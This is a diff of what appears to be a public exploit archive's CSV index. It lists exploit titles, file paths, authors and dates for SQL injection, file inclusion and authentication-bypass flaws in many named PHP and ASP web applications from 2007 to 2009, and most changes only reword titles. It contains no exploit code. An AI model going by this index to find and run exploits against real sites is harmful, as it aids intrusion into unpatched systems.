3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection",2007-03-05,ajann,php,webapps,0 @@ -17510,7 +17524,7 @@ id,file,description,date,author,platform,type,port 3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3848,platforms/php/webapps/3848.txt,"workbench 0.11 - (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0 -3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - (debug_show.php) SQL Injection",2007-05-04,rgod,php,webapps,0 +3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - 'debug_show.php' SQL Injection",2007-05-04,rgod,php,webapps,0 3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 @@ -17835,7 +17849,7 @@ id,file,description,date,author,platform,type,port 4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0 -4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0 +4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - 'abc' Parameter SQL Injection",2007-09-19,str0ke,php,webapps,0 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps,0 @@ -17995,7 +18009,7 @@ id,file,description,date,author,platform,type,port 4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0 -4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - disclaimer.php Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0 +4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0 4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps,0 @@ -18648,39 +18662,39 @@ id,file,description,date,author,platform,type,port 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps,0 5550,platforms/php/webapps/5550.php,"DeluxeBB 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - 'search.php' SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0 -5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 -5553,platforms/asp/webapps/5553.txt,"FipsCMS - 'print.asp lg' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 -5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection",2008-05-07,cOndemned,php,webapps,0 -5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 +5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' Parameter SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 +5553,platforms/asp/webapps/5553.txt,"FipsCMS 2.1 - 'print.asp' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 +5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - 'cat' Parameter SQL Injection",2008-05-07,cOndemned,php,webapps,0 +5555,platforms/php/webapps/5555.txt,"GameCMS Lite 1.0 - 'systemId' Parameter SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' Parameter SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0 -5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 +5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 5559,platforms/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0 -5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - (artistId) SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 -5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - (msg_image) SQL Injection",2008-05-08,The:Paradox,php,webapps,0 +5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - 'artistId' Parameter SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 +5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - 'msg_image' Parameter SQL Injection",2008-05-08,The:Paradox,php,webapps,0 5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple SQL Injections",2008-05-08,U238,asp,webapps,0 -5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - (tid) SQL Injection",2008-05-08,Saime,php,webapps,0 +5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - 'tid' Parameter SQL Injection",2008-05-08,Saime,php,webapps,0 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 -5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 -5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 +5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - 'rep' Parameter Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 +5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - 'del.php' Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - 'getfile.php' Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0 -5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - (prodid) SQL Injection",2008-05-09,JosS,php,webapps,0 +5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - 'prodid' Parameter SQL Injection",2008-05-09,JosS,php,webapps,0 5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 -5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0 +5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2008-05-09,tw8,php,webapps,0 5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - 'index.php' Local File Inclusion",2008-05-09,cOndemned,php,webapps,0 -5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 +5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - 'gid' Parameter SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 - SQL Injection",2008-05-10,His0k4,php,webapps,0 5582,platforms/php/webapps/5582.txt,"Ktools Photostore 3.5.2 - Multiple SQL Injections",2008-05-10,DNX,php,webapps,0 -5583,platforms/php/webapps/5583.php,"Joomla! Component com_datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0 +5583,platforms/php/webapps/5583.php,"Joomla! Component Datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0 5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusion",2008-05-11,CraCkEr,php,webapps,0 5587,platforms/php/webapps/5587.pl,"Joomla! Component xsstream-dm 0.01b - SQL Injection",2008-05-11,Houssamix,php,webapps,0 5588,platforms/php/webapps/5588.php,"QuickUpCMS - Multiple SQL Injections Vulnerabilities",2008-05-11,Lidloses_Auge,php,webapps,0 -5589,platforms/php/webapps/5589.php,"Vortex CMS - 'index.php pageid' Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0 -5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - (featured_article.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - (classifide_ad.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5589,platforms/php/webapps/5589.php,"Vortex CMS - 'pageid' Parameter Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0 +5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - 'featured_article.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - 'category_list.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 +5595,platforms/php/webapps/5595.txt,"ClanLite 2.x - SQL Injection / Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 @@ -18748,7 +18762,7 @@ id,file,description,date,author,platform,type,port 5665,platforms/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection",2008-05-21,Mr.SQL,php,webapps,0 5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0 5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0 -5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - (install_mod.php) Local File Inclusion",2008-05-23,DSecRG,php,webapps,0 +5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - 'install_mod.php' Local File Inclusion",2008-05-23,DSecRG,php,webapps,0 5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - (idresa) SQL Injection",2008-05-24,His0k4,php,webapps,0 5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion",2008-05-24,Kacak,php,webapps,0 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0 @@ -18912,8 +18926,8 @@ id,file,description,date,author,platform,type,port 5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0 5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - (saArticle[ID]) SQL Injection",2008-06-19,anonymous,php,webapps,0 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0 -5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection",2008-06-19,"Hussin X",php,webapps,0 -5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' SQL Injection",2008-06-19,"Hussin X",php,webapps,0 +5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - 'cate_id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0 +5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0 5869,platforms/php/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 @@ -19135,7 +19149,7 @@ id,file,description,date,author,platform,type,port 6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0 -6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - (r) SQL Injection",2008-07-26,U238,asp,webapps,0 +6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0 6136,platforms/php/webapps/6136.txt,"phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 @@ -19425,7 +19439,7 @@ id,file,description,date,author,platform,type,port 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,php,webapps,0 6547,platforms/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps,0 -6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'detail.php item_id' SQL Injection",2008-09-24,GoLd_M,php,webapps,0 +6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection",2008-09-24,GoLd_M,php,webapps,0 6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0 6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0 6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0 @@ -19434,7 +19448,7 @@ id,file,description,date,author,platform,type,port 6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0 6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0 -6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection",2008-09-25,InjEctOr5,php,webapps,0 +6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection",2008-09-25,InjEctOr5,php,webapps,0 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - (design) Local File Inclusion",2008-09-25,dun,php,webapps,0 6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0 6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - (task) Local File Inclusion",2008-09-25,dun,php,webapps,0 @@ -19599,7 +19613,7 @@ id,file,description,date,author,platform,type,port 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0 -6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0 +6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 @@ -19709,12 +19723,11 @@ id,file,description,date,author,platform,type,port 6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - 'Directory.php cat' SQL Injection",2008-11-01,Hakxer,php,webapps,0 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - 'id' SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 -6927,platforms/php/webapps/6927.txt,"AJ Article - 'featured_article.php mode' SQL Injection",2008-11-01,Mr.SQL,php,webapps,0 6928,platforms/php/webapps/6928.txt,"Joomla! Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0 6929,platforms/php/webapps/6929.txt,"Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - 'details.php id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6932,platforms/php/webapps/6932.txt,"AJ ARTICLE - (Authentication Bypass) SQL Injection",2008-11-01,Hakxer,php,webapps,0 +6932,platforms/php/webapps/6932.txt,"AJ Article 1.0 - Authentication Bypass",2008-11-01,Hakxer,php,webapps,0 6933,platforms/php/webapps/6933.pl,"Micro CMS 0.3.5 - Remote Add/Delete/Password Change Exploit",2008-11-01,StAkeR,php,webapps,0 6934,platforms/php/webapps/6934.txt,"Shahrood - 'ndetail.php id' Blind SQL Injection",2008-11-01,BazOka-HaCkEr,php,webapps,0 6935,platforms/php/webapps/6935.txt,"YourFreeWorld Downline Builder - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 @@ -19835,7 +19848,7 @@ id,file,description,date,author,platform,type,port 7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 -7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0 +7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0 7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection",2008-11-08,Cyber-Zone,php,webapps,0 @@ -19850,7 +19863,7 @@ id,file,description,date,author,platform,type,port 7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0 -7081,platforms/php/webapps/7081.txt,"AJ ARTICLE - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 +7081,platforms/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 @@ -19901,7 +19914,7 @@ id,file,description,date,author,platform,type,port 7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 -7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0 +7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 @@ -20415,7 +20428,7 @@ id,file,description,date,author,platform,type,port 7833,platforms/php/webapps/7833.php,"Joomla! Component com_waticketsystem - Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0 7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection",2009-01-19,"Danny Moules",php,webapps,0 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0 -7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' SQL Injection",2009-01-20,snakespc,php,webapps,0 +7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' Parameter SQL Injection",2009-01-20,snakespc,php,webapps,0 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution",2009-01-20,Osirys,php,webapps,0 7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion",2009-01-20,Stack,php,webapps,0 7840,platforms/php/webapps/7840.pl,"Joomla! Component Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps,0 @@ -20868,7 +20881,7 @@ id,file,description,date,author,platform,type,port 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0 8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps,0 -8664,platforms/php/webapps/8664.pl,"BigACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 +8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0 @@ -20984,7 +20997,7 @@ id,file,description,date,author,platform,type,port 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0 -8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,php,webapps,0 +8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0 @@ -21147,7 +21160,7 @@ id,file,description,date,author,platform,type,port 9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0 -9052,platforms/php/webapps/9052.txt,"BigACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 +9052,platforms/php/webapps/9052.txt,"BigACE 2.6 - 'cmd' Parameter Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0 9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0 @@ -21195,7 +21208,7 @@ 